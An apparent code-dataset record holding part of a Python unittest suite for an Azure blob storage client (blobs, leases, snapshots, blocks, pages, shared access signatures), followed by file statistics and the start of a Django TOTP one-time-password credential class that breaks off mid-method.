self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
blob = self.bc.get_blob(self.container_name, 'blob1')
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello world')
def test_get_blob_with_snapshot(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
snapshot = self.bc.snapshot_blob(self.container_name, 'blob1')
# Act
blob = self.bc.get_blob(self.container_name, 'blob1', snapshot['x-ms-snapshot'])
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello world')
def test_get_blob_with_snapshot_previous(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
snapshot = self.bc.snapshot_blob(self.container_name, 'blob1')
self.bc.put_blob(self.container_name, 'blob1', 'hello world again', 'BlockBlob')
# Act
blob_previous = self.bc.get_blob(self.container_name, 'blob1', snapshot['x-ms-snapshot'])
blob_latest = self.bc.get_blob(self.container_name, 'blob1')
# Assert
self.assertIsInstance(blob_previous, BlobResult)
self.assertIsInstance(blob_latest, BlobResult)
self.assertEquals(blob_previous, 'hello world')
self.assertEquals(blob_latest, 'hello world again')
def test_get_blob_with_range(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_range='bytes=0-5')
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello ')
def test_get_blob_with_range_and_get_content_md5(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_range='bytes=0-5', x_ms_range_get_content_md5='true')
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello ')
self.assertEquals(blob.properties['content-md5'], '+BSJN3e8wilf/wXwDlCNpg==')
def test_get_blob_with_lease(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
lease_id = lease['x-ms-lease-id']
# Act
blob = self.bc.get_blob(self.container_name, 'blob1', x_ms_lease_id=lease_id)
self.bc.lease_blob(self.container_name, 'blob1', 'release', lease_id)
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello world')
def test_get_blob_on_leased_blob_without_lease_id(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
# Act
blob = self.bc.get_blob(self.container_name, 'blob1') # get_blob is allowed without lease id
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello world')
def test_get_blob_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_blob(self.container_name, 'blob1')
# Assert
def test_get_blob_with_non_existing_blob(self):
# Arrange
self._create_container(self.container_name)
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_blob(self.container_name, 'blob1')
# Assert
def test_set_blob_properties_with_existing_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp = self.bc.set_blob_properties(self.container_name, 'blob1', x_ms_blob_content_language='spanish')
# Assert
self.assertIsNone(resp)
props = self.bc.get_blob_properties(self.container_name, 'blob1')
self.assertEquals(props['content-language'], 'spanish')
def test_set_blob_properties_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.set_blob_properties(self.container_name, 'blob1', x_ms_blob_content_language='spanish')
# Assert
def test_set_blob_properties_with_non_existing_blob(self):
# Arrange
self._create_container(self.container_name)
# Act
with self.assertRaises(WindowsAzureError):
self.bc.set_blob_properties(self.container_name, 'blob1', x_ms_blob_content_language='spanish')
# Assert
def test_get_blob_properties_with_existing_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
props = self.bc.get_blob_properties(self.container_name, 'blob1')
# Assert
self.assertIsNotNone(props)
self.assertEquals(props['x-ms-blob-type'], 'BlockBlob')
self.assertEquals(props['content-length'], '11')
self.assertEquals(props['x-ms-lease-status'], 'unlocked')
def test_get_blob_properties_with_leased_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
# Act
props = self.bc.get_blob_properties(self.container_name, 'blob1')
# Assert
self.assertIsNotNone(props)
self.assertEquals(props['x-ms-blob-type'], 'BlockBlob')
self.assertEquals(props['content-length'], '11')
self.assertEquals(props['x-ms-lease-status'], 'locked')
self.assertEquals(props['x-ms-lease-state'], 'leased')
self.assertEquals(props['x-ms-lease-duration'], 'fixed')
def test_get_blob_properties_with_non_existing_container(self):
# Arrange
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_blob_properties(self.container_name, 'blob1')
# Assert
def test_get_blob_properties_with_non_existing_blob(self):
# Arrange
self._create_container(self.container_name)
# Act
with self.assertRaises(WindowsAzureError):
self.bc.get_blob_properties(self.container_name, 'blob1')
# Assert
def test_get_blob_metadata_with_existing_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
md = self.bc.get_blob_metadata(self.container_name, 'blob1')
# Assert
self.assertIsNotNone(md)
def test_set_blob_metadata_with_existing_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp = self.bc.set_blob_metadata(self.container_name, 'blob1', {'hello':'world', 'foo':'42', 'UP':'UPval'})
# Assert
self.assertIsNone(resp)
md = self.bc.get_blob_metadata(self.container_name, 'blob1')
self.assertEquals(3, len(md))
self.assertEquals(md['x-ms-meta-hello'], 'world')
self.assertEquals(md['x-ms-meta-foo'], '42')
self.assertEquals(md['x-ms-meta-up'], 'UPval')
def test_delete_blob_with_existing_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp = self.bc.delete_blob(self.container_name, 'blob1')
# Assert
self.assertIsNone(resp)
def test_delete_blob_with_non_existing_blob(self):
# Arrange
self._create_container(self.container_name)
# Act
with self.assertRaises(WindowsAzureError):
self.bc.delete_blob(self.container_name, 'blob1')
# Assert
def test_copy_blob_with_existing_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
sourceblob = '/%s/%s/%s' % (credentials.getStorageServicesName(),
self.container_name,
'blob1')
resp = self.bc.copy_blob(self.container_name, 'blob1copy', sourceblob)
# Assert
self.assertIsNotNone(resp)
self.assertEquals(resp['x-ms-copy-status'], 'success')
self.assertIsNotNone(resp['x-ms-copy-id'])
copy = self.bc.get_blob(self.container_name, 'blob1copy')
self.assertEquals(copy, 'hello world')
# TODO:
# We need to find out how to get azure to make the copy asynchronously.
# It seems like no matter how big the blob is (60GB), the copy is always
# synchronous - even going cross account and making several consecutive copies.
#def test_abort_copy_blob(self):
# # Arrange
# self._create_container(self.container_name)
# source_container_name = 'sourcecontainer'
# source_blob_name = 'sourceblob'
# if not self._blob_exists(source_container_name, source_blob_name):
# self._create_container_and_block_blob_with_random_data(source_container_name, source_blob_name, 500, 4 * 1024 * 1024)
# source_blob_url = self.bc.make_blob_url(source_container_name, source_blob_name)
# # Act
# success = False
# for i in range(0, 50):
# target_blob_name = 'targetblob{0}'.format(i)
# copy_resp = self.bc.copy_blob(self.container_name, target_blob_name, source_blob_url)
# if copy_resp['x-ms-copy-status'] == 'pending':
# self.bc.abort_copy_blob(self.container_name, 'targetblob', copy_resp['x-ms-copy-id'])
# success = True
# break
# # Assert
# self.assertTrue(success)
def test_abort_copy_blob_with_synchronous_copy_fails(self):
# Arrange
source_blob_name = 'sourceblob'
self._create_container_and_block_blob(self.container_name, source_blob_name, 'hello world')
source_blob_url = self.bc.make_blob_url(self.container_name, source_blob_name)
# Act
target_blob_name = 'targetblob'
copy_resp = self.bc.copy_blob(self.container_name, target_blob_name, source_blob_url)
with self.assertRaises(WindowsAzureError):
self.bc.abort_copy_blob(self.container_name, target_blob_name, copy_resp['x-ms-copy-id'])
# Assert
self.assertEquals(copy_resp['x-ms-copy-status'], 'success')
def test_snapshot_blob(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp = self.bc.snapshot_blob(self.container_name, 'blob1')
# Assert
self.assertIsNotNone(resp)
self.assertIsNotNone(resp['x-ms-snapshot'])
def test_lease_blob_acquire_and_release(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'release', resp1['x-ms-lease-id'])
resp3 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
# Assert
self.assertIsNotNone(resp1)
self.assertIsNotNone(resp2)
self.assertIsNotNone(resp3)
def test_lease_blob_with_duration(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire', x_ms_lease_duration=15)
resp2 = self.bc.put_blob(self.container_name, 'blob1', 'hello 2', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
time.sleep(15)
with self.assertRaises(WindowsAzureError):
self.bc.put_blob(self.container_name, 'blob1', 'hello 3', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
# Assert
self.assertIsNotNone(resp1)
self.assertIsNone(resp2)
def test_lease_blob_with_proposed_lease_id(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
lease_id = 'a0e6c241-96ea-45a3-a44b-6ae868bc14d0'
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire', x_ms_proposed_lease_id=lease_id)
# Assert
self.assertIsNotNone(resp1)
self.assertEquals(resp1['x-ms-lease-id'], lease_id)
def test_lease_blob_change_lease_id(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
lease_id = 'a0e6c241-96ea-45a3-a44b-6ae868bc14d0'
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'change', x_ms_lease_id=resp1['x-ms-lease-id'], x_ms_proposed_lease_id=lease_id)
# Assert
self.assertIsNotNone(resp1)
self.assertIsNotNone(resp2)
self.assertNotEquals(resp1['x-ms-lease-id'], lease_id)
self.assertEquals(resp2['x-ms-lease-id'], lease_id)
def test_lease_blob_renew_released_lease_fails(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'release', resp1['x-ms-lease-id'])
with self.assertRaises(WindowsAzureConflictError):
self.bc.lease_blob(self.container_name, 'blob1', 'renew', resp1['x-ms-lease-id'])
# Assert
self.assertIsNotNone(resp1)
self.assertIsNotNone(resp2)
def test_lease_blob_break_period(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire', x_ms_lease_duration=15)
resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'break', resp1['x-ms-lease-id'], x_ms_lease_break_period=5)
resp3 = self.bc.put_blob(self.container_name, 'blob1', 'hello 2', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
time.sleep(5)
with self.assertRaises(WindowsAzureError):
self.bc.put_blob(self.container_name, 'blob1', 'hello 3', 'BlockBlob', x_ms_lease_id=resp1['x-ms-lease-id'])
# Assert
self.assertIsNotNone(resp1)
self.assertIsNotNone(resp2)
self.assertIsNone(resp3)
def test_lease_blob_break_released_lease_fails(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
self.bc.lease_blob(self.container_name, 'blob1', 'release', lease['x-ms-lease-id'])
# Act
with self.assertRaises(WindowsAzureConflictError):
self.bc.lease_blob(self.container_name, 'blob1', 'break', lease['x-ms-lease-id'])
# Assert
def test_lease_blob_acquire_after_break_fails(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
lease = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
self.bc.lease_blob(self.container_name, 'blob1', 'break', lease['x-ms-lease-id'])
# Act
with self.assertRaises(WindowsAzureConflictError):
self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
# Assert
def test_lease_blob_acquire_and_renew(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
# Act
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'renew', resp1['x-ms-lease-id'])
# Assert
self.assertIsNotNone(resp1)
self.assertIsNotNone(resp2)
def test_lease_blob_acquire_twice_fails(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', 'hello world')
resp1 = self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
# Act
with self.assertRaises(WindowsAzureError):
self.bc.lease_blob(self.container_name, 'blob1', 'acquire')
resp2 = self.bc.lease_blob(self.container_name, 'blob1', 'release', resp1['x-ms-lease-id'])
# Assert
self.assertIsNotNone(resp1)
self.assertIsNotNone(resp2)
def test_put_block(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', '')
# Act
for i in xrange(5):
resp = self.bc.put_block(self.container_name,
'blob1',
'block %d' % (i),
str(i))
self.assertIsNone(resp)
# Assert
def test_put_block_list(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', '')
self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
# Act
resp = self.bc.put_block_list(self.container_name, 'blob1', ['1', '2', '3'])
# Assert
self.assertIsNone(resp)
blob = self.bc.get_blob(self.container_name, 'blob1')
self.assertEqual(blob, 'AAABBBCCC')
def test_get_block_list_no_blocks(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', '')
# Act
block_list = self.bc.get_block_list(self.container_name, 'blob1', None, 'all')
# Assert
self.assertIsNotNone(block_list)
self.assertIsInstance(block_list, BlobBlockList)
self.assertEquals(len(block_list.uncommitted_blocks), 0)
self.assertEquals(len(block_list.committed_blocks), 0)
def test_get_block_list_uncommitted_blocks(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', '')
self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
# Act
block_list = self.bc.get_block_list(self.container_name, 'blob1', None, 'all')
# Assert
self.assertIsNotNone(block_list)
self.assertIsInstance(block_list, BlobBlockList)
self.assertEquals(len(block_list.uncommitted_blocks), 3)
self.assertEquals(len(block_list.committed_blocks), 0)
def test_get_block_list_committed_blocks(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', '')
self.bc.put_block(self.container_name, 'blob1', 'AAA', '1')
self.bc.put_block(self.container_name, 'blob1', 'BBB', '2')
self.bc.put_block(self.container_name, 'blob1', 'CCC', '3')
self.bc.put_block_list(self.container_name, 'blob1', ['1', '2', '3'])
# Act
block_list = self.bc.get_block_list(self.container_name, 'blob1', None, 'all')
# Assert
self.assertIsNotNone(block_list)
self.assertIsInstance(block_list, BlobBlockList)
self.assertEquals(len(block_list.uncommitted_blocks), 0)
self.assertEquals(len(block_list.committed_blocks), 3)
def test_put_page_update(self):
# Arrange
self._create_container_and_page_blob(self.container_name, 'blob1', 1024)
# Act
data = 'abcdefghijklmnop' * 32
resp = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=0-511', 'update')
# Assert
self.assertIsNone(resp)
def test_put_page_clear(self):
# Arrange
self._create_container_and_page_blob(self.container_name, 'blob1', 1024)
# Act
resp = self.bc.put_page(self.container_name, 'blob1', '', 'bytes=0-511', 'clear')
# Assert
self.assertIsNone(resp)
def test_get_page_ranges_no_pages(self):
# Arrange
self._create_container_and_page_blob(self.container_name, 'blob1', 1024)
# Act
ranges = self.bc.get_page_ranges(self.container_name, 'blob1')
# Assert
self.assertIsNotNone(ranges)
self.assertIsInstance(ranges, PageList)
self.assertEquals(len(ranges.page_ranges), 0)
def test_get_page_ranges_2_pages(self):
# Arrange
self._create_container_and_page_blob(self.container_name, 'blob1', 2048)
data = 'abcdefghijklmnop' * 32
resp1 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=0-511', 'update')
resp2 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=1024-1535', 'update')
# Act
ranges = self.bc.get_page_ranges(self.container_name, 'blob1')
# Assert
self.assertIsNotNone(ranges)
self.assertIsInstance(ranges, PageList)
self.assertEquals(len(ranges.page_ranges), 2)
self.assertEquals(ranges.page_ranges[0].start, 0)
self.assertEquals(ranges.page_ranges[0].end, 511)
self.assertEquals(ranges.page_ranges[1].start, 1024)
self.assertEquals(ranges.page_ranges[1].end, 1535)
def test_get_page_ranges_iter(self):
# Arrange
self._create_container_and_page_blob(self.container_name, 'blob1', 2048)
data = 'abcdefghijklmnop' * 32
resp1 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=0-511', 'update')
resp2 = self.bc.put_page(self.container_name, 'blob1', data, 'bytes=1024-1535', 'update')
# Act
ranges = self.bc.get_page_ranges(self.container_name, 'blob1')
for range in ranges:
pass
# Assert
self.assertEquals(len(ranges), 2)
self.assertIsInstance(ranges[0], PageRange)
self.assertIsInstance(ranges[1], PageRange)
def test_with_filter(self):
# Single filter
called = []
def my_filter(request, next):
called.append(True)
self.assertIsInstance(request, HTTPRequest)
for header in request.headers:
self.assertIsInstance(header, tuple)
for item in header:
self.assertIsInstance(item, (str, unicode, type(None)))
self.assertIsInstance(request.host, (str, unicode))
self.assertIsInstance(request.method, (str, unicode))
self.assertIsInstance(request.path, (str, unicode))
self.assertIsInstance(request.query, list)
self.assertIsInstance(request.body, (str, unicode))
response = next(request)
self.assertIsInstance(response, HTTPResponse)
self.assertIsInstance(response.body, (str, type(None)))
self.assertIsInstance(response.headers, list)
for header in response.headers:
self.assertIsInstance(header, tuple)
for item in header:
self.assertIsInstance(item, (str, unicode))
self.assertIsInstance(response.status, int)
return response
bc = self.bc.with_filter(my_filter)
bc.create_container(self.container_name + '0', None, None, False)
self.assertTrue(called)
del called[:]
bc.delete_container(self.container_name + '0')
self.assertTrue(called)
del called[:]
# Chained filters
def filter_a(request, next):
called.append('a')
return next(request)
def filter_b(request, next):
called.append('b')
return next(request)
bc = self.bc.with_filter(filter_a).with_filter(filter_b)
bc.create_container(self.container_name + '1', None, None, False)
self.assertEqual(called, ['b', 'a'])
bc.delete_container(self.container_name + '1')
self.assertEqual(called, ['b', 'a', 'b', 'a'])
def test_unicode_create_container_unicode_name(self):
# Arrange
self.container_name = unicode(self.container_name) + u'啊齄丂狛狜'
# Act
with self.assertRaises(WindowsAzureError):
# not supported - container name must be alphanumeric, lowercase
self.bc.create_container(self.container_name)
# Assert
def test_unicode_get_blob_unicode_name(self):
# Arrange
self._create_container_and_block_blob(self.container_name, '啊齄丂狛狜', 'hello world')
# Act
blob = self.bc.get_blob(self.container_name, '啊齄丂狛狜')
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello world')
def test_unicode_get_blob_unicode_data(self):
# Arrange
self._create_container_and_block_blob(self.container_name, 'blob1', u'hello world啊齄丂狛狜')
# Act
blob = self.bc.get_blob(self.container_name, 'blob1')
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, 'hello world啊齄丂狛狜')
def test_unicode_get_blob_binary_data(self):
# Arrange
base64_data = 'AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wABAgMEBQYHCAkKCwwNDg8QERITFBUWFxgZGhscHR4fICEiIyQlJicoKSorLC0uLzAxMjM0NTY3ODk6Ozw9Pj9AQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVpbXF1eX2BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ent8fX5/gIGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmJmam5ydnp+goaKjpKWmp6ipqqusra6vsLGys7S1tre4ubq7vL2+v8DBwsPExcbHyMnKy8zNzs/Q0dLT1NXW19jZ2tvc3d7f4OHi4+Tl5ufo6err7O3u7/Dx8vP09fb3+Pn6+/z9/v8AAQIDBAUGBwgJCgsMDQ4PEBESExQVFhcYGRobHB0eHyAhIiMkJSYnKCkqKywtLi8wMTIzNDU2Nzg5Ojs8PT4/QEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaW1xdXl9gYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXp7fH1+f4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/w=='
binary_data = base64.b64decode(base64_data)
self._create_container_and_block_blob(self.container_name, 'blob1', binary_data)
# Act
blob = self.bc.get_blob(self.container_name, 'blob1')
# Assert
self.assertIsInstance(blob, BlobResult)
self.assertEquals(blob, binary_data)
def test_no_sas_private_blob(self):
# Arrange
data = 'a private blob cannot be read without a shared access signature'
self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
res_path = self.container_name + '/blob1.txt'
# Act
host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
url = '/' + res_path
respbody = self._get_request(host, url)
# Assert
self.assertNotEquals(data, respbody)
self.assertNotEquals(-1, respbody.find('ResourceNotFound'))
def test_no_sas_public_blob(self):
# Arrange
data = 'a public blob can be read without a shared access signature'
self.bc.create_container(self.container_name, None, 'blob')
self.bc.put_blob(self.container_name, 'blob1.txt', data, 'BlockBlob')
res_path = self.container_name + '/blob1.txt'
# Act
host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
url = '/' + res_path
respbody = self._get_request(host, url)
# Assert
self.assertEquals(data, respbody)
def test_shared_read_access_blob(self):
# Arrange
data = 'shared access signature with read permission on blob'
self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
sas = SharedAccessSignature(credentials.getStorageServicesName(),
credentials.getStorageServicesKey())
res_path = self.container_name + '/blob1.txt'
res_type = RESOURCE_BLOB
# Act
sas.permission_set = [self._get_permission(sas, res_type, res_path, 'r')]
web_rsrc = self._get_signed_web_resource(sas, res_type, res_path, 'r')
host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
url = web_rsrc.request_url
respbody = self._get_request(host, url)
# Assert
self.assertEquals(data, respbody)
def test_shared_write_access_blob(self):
# Arrange
data = 'shared access signature with write permission on blob'
updated_data = 'updated blob data'
self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
sas = SharedAccessSignature(credentials.getStorageServicesName(),
credentials.getStorageServicesKey())
res_path = self.container_name + '/blob1.txt'
res_type = RESOURCE_BLOB
# Act
sas.permission_set = [self._get_permission(sas, res_type, res_path, 'w')]
web_rsrc = self._get_signed_web_resource(sas, res_type, res_path, 'w')
host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
url = web_rsrc.request_url
respbody = self._put_request(host, url, updated_data)
# Assert
blob = self.bc.get_blob(self.container_name, 'blob1.txt')
self.assertEquals(updated_data, blob)
def test_shared_delete_access_blob(self):
# Arrange
data = 'shared access signature with delete permission on blob'
self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
sas = SharedAccessSignature(credentials.getStorageServicesName(),
credentials.getStorageServicesKey())
res_path = self.container_name + '/blob1.txt'
res_type = RESOURCE_BLOB
# Act
sas.permission_set = [self._get_permission(sas, res_type, res_path, 'd')]
web_rsrc = self._get_signed_web_resource(sas, res_type, res_path, 'd')
host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
url = web_rsrc.request_url
respbody = self._del_request(host, url)
# Assert
with self.assertRaises(WindowsAzureError):
blob = self.bc.get_blob(self.container_name, 'blob1.txt')
def test_shared_access_container(self):
# Arrange
data = 'shared access signature with read permission on container'
self._create_container_and_block_blob(self.container_name, 'blob1.txt', data)
sas = SharedAccessSignature(credentials.getStorageServicesName(),
credentials.getStorageServicesKey())
res_path = self.container_name
res_type = RESOURCE_CONTAINER
# Act
sas.permission_set = [self._get_permission(sas, res_type, res_path, 'r')]
web_rsrc = self._get_signed_web_resource(sas, res_type, res_path + '/blob1.txt', 'r')
host = credentials.getStorageServicesName() + BLOB_SERVICE_HOST_BASE
url = web_rsrc.request_url
respbody = self._get_request(host, url)
# Assert
self.assertEquals(data, respbody)
#------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| 39.352528
| 1,392
| 0.650844
| 9,698
| 84,057
| 5.382656
| 0.053826
| 0.105094
| 0.128312
| 0.066589
| 0.834716
| 0.798989
| 0.741633
| 0.710063
| 0.674661
| 0.647516
| 0
| 0.017673
| 0.234638
| 84,057
| 2,135
| 1,393
| 39.37096
| 0.793717
| 0.059115
| 0
| 0.532582
| 0
| 0.000805
| 0.105023
| 0.029324
| 0
| 1
| 0
| 0.000468
| 0.311344
| 0
| null | null | 0.004827
| 0.010459
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
eec21dc3984ae642f408ff4ab866c692049f20c6
| 7,061
|
py
|
Python
|
applications/talos/directory/onetimepassword_credential.py
|
triflesoft/django-application-talos
|
73e697c60a4e3117a76b5d7e3f4aa0fca7cfa529
|
[
"BSD-3-Clause"
] | 2
|
2017-04-25T10:30:20.000Z
|
2017-09-16T05:17:36.000Z
|
applications/talos/directory/onetimepassword_credential.py
|
triflesoft/django-application-talos
|
73e697c60a4e3117a76b5d7e3f4aa0fca7cfa529
|
[
"BSD-3-Clause"
] | 4
|
2018-10-29T15:07:48.000Z
|
2018-10-29T15:15:41.000Z
|
applications/talos/directory/onetimepassword_credential.py
|
triflesoft/django-application-talos
|
73e697c60a4e3117a76b5d7e3f4aa0fca7cfa529
|
[
"BSD-3-Clause"
] | null | null | null |
class InternalGoogleAuthenticator(object):
def __init__(self, credential_directory, **kwargs):
self._credential_directory = credential_directory
def create_credentials(self, principal, credentials):
from pyotp import random_base32
from uuid import uuid4
from ..models import _tzmin
from ..models import _tzmax
from ..models import OneTimePasswordCredential
otp_credential = OneTimePasswordCredential()
otp_credential.uuid = uuid4()
otp_credential.principal = principal
otp_credential.valid_from = _tzmin()
otp_credential.valid_till = _tzmax()
otp_credential.directory = self._credential_directory
if credentials.get('salt', None):
base32_secret = credentials['salt']
otp_credential.is_activated = True
else:
base32_secret = random_base32()
otp_credential.salt = base32_secret.encode()
otp_credential.save()
return otp_credential.salt
def verify_credentials(self, principal, credentials):
from pyotp import TOTP
from ..models import _tznow
from ..models import OneTimePasswordCredential
code = credentials['code']
try:
otp_credential = self._credential_directory.credentials.get(
principal=principal,
valid_from__lte=_tznow(),
valid_till__gte=_tznow())
secret_key = otp_credential.salt.decode()
totp = TOTP(secret_key)
if totp.verify(code, valid_window=1):
return True
except OneTimePasswordCredential.DoesNotExist:
pass
return False
def update_credentials(self, principal, old_credentials, new_credentials):
from ..models import _tznow
from ..models import OneTimePasswordCredential
try:
otp_credential = self._credential_directory.credentials.get(
principal=principal,
valid_from__lte=_tznow(),
valid_till__gte=_tznow())
if new_credentials.get('salt', None):
otp_credential.salt = new_credentials['salt'].encode()
otp_credential.save()
return True
except OneTimePasswordCredential.DoesNotExist:
pass
return False
def reset_credentials(self, super_principal, principal, credentials):
from ..models import _tznow
from ..models import OneTimePasswordCredential
try:
otp_credential = self._credential_directory.credentials.get(
principal=principal,
valid_from__lte=_tznow(),
valid_till__gte=_tznow())
otp_credential.delete()
return True
except OneTimePasswordCredential.DoesNotExist:
pass
return False
def generate_credentials(self, principal, credentials):
return False
def send_otp(self, principal, credential):
pass
def verify_otp(self, principal, credential, code):
import pyotp
# Type of salt is memoryview
salt = credential.salt
totp = pyotp.TOTP(salt.tobytes())
